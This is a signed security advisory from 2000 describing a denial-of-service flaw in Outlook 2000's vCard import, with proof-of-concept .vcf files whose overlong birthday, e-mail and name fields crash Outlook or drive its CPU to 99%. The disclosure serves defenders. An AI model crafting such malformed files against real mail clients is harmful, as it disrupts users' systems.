vCard DoS on Outlook 2000

[joelmoses () MINDSPRING COM]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in vCard import in Outlook 2000
Released: August 30, 2000

Summary
=======

Under certain conditions, excessively long or malformed fields in a
vCard (.vcf) file can  cause Microsoft Outlook 2000 to either
overflow or excessively utilize system resources.


Background
==========

The specifications regarding vCard MIME types and field contents can
be found in RFCs 2425  and 2426.

Although RFC 2426 section 2.6 specifically requires lines longer than
75 characters to be  folded as defined in [MIME-DIR], it appears
Outlook does not support line folding, and will  attempt to import
any field in the file as one value, even if it is several pages long
or  (in one case) overflows a data field within Outlook.

The effect this unlimited import attempt has on Outlook 2000 varies
between field types.  Some fields will cause Outlook to consume
nearly all CPU time, and certain others  (especially date/revision
fields and e-mail fields) will cause Outlook to terminiate
immediately due to an overflow.


Severity
========

Outlook 2000 does not attempt to open and import a .vcf file that a
user receives via e-mail  without prompting the user first. However,
vCard files are extremely common, and many users  have trained
themselves to ignore the warning dialog box.

Outlook does, however, open a vCard file with no questions asked if
the user saves it to a  directory and double-clicks it from Windows
Explorer. In this situation, the vCard is  processed directly with no
warning or status messages displayed to the user.


Affected Configurations
=======================

Microsoft Outlook 2000 was the only platform tested (on Windows NT
4.0 Workstation,
Service Pack 6a+hotfixes).

Affected fields in vCard file causing an overflow:

- - email:
- - bday; value=date (as low as 52 characters of form YYYY-MM-D(60)

Affected fields in vCard file causing excessive CPU utilization:

- - name:
- - nickname:
- - fn:
- - title:
- - title;language=de;value=text:
- - tel:
- - tel;<label>:
- - tel;<label>,<label>:

Fields which do not appear to be affected:

- - note:

Fields which do not appear to be supported:

- - any fields which continue on the next line or have defined newlines
  per RFC-2425
- - key:
- - o:

No other fields were tested.


Examples
========

The following examples will cause the advertised behavior.

1) A modification of the "bday" field to extend beyond 55 characters.
This example appears  to be the smallest amount of text required to
elicit the symptom. This example will cause  Outlook 2000 to overflow
and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927
4982739472937492873
EMAIL;PREF;INTERNET:mb () goerlitz de
REV:20000830T191121Z
END:VCARD

2) A modification of the "e-mail" field with a large amount of text
data masquerading as an  e-mail address. This example will cause
Outlook 2000 to overflow and terminate.


BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb () goerlitz de sadsack nothing doing is an.overflo
.possible.sadsack.not hing.doing.is.an.overflow.possible.

<content clipped for brevity - envision lots of text here>

.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD

3) A modification of the "N" or "name" field with a large amount of
text will not cause  Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.

BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister

<content clipped for brevity - envision lots of text here>

Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger  MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb () goerlitz de
REV:20000830T191121Z
END:VCARD


Resolution
==========

None at present, other than to disassociate the .vcf extension from
Outlook. There may be  more fields affected -- these are merely the
initially tested ones.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.1

iQA/AwUBOa1u3MZCl66UabcJEQJADgCfUY+6ZlnpsRevurebbD/M1XrlMfIAn1TO
LSZIBp6xoMPl4Tc5unZeICka
=N+p4
-----END PGP SIGNATURE-----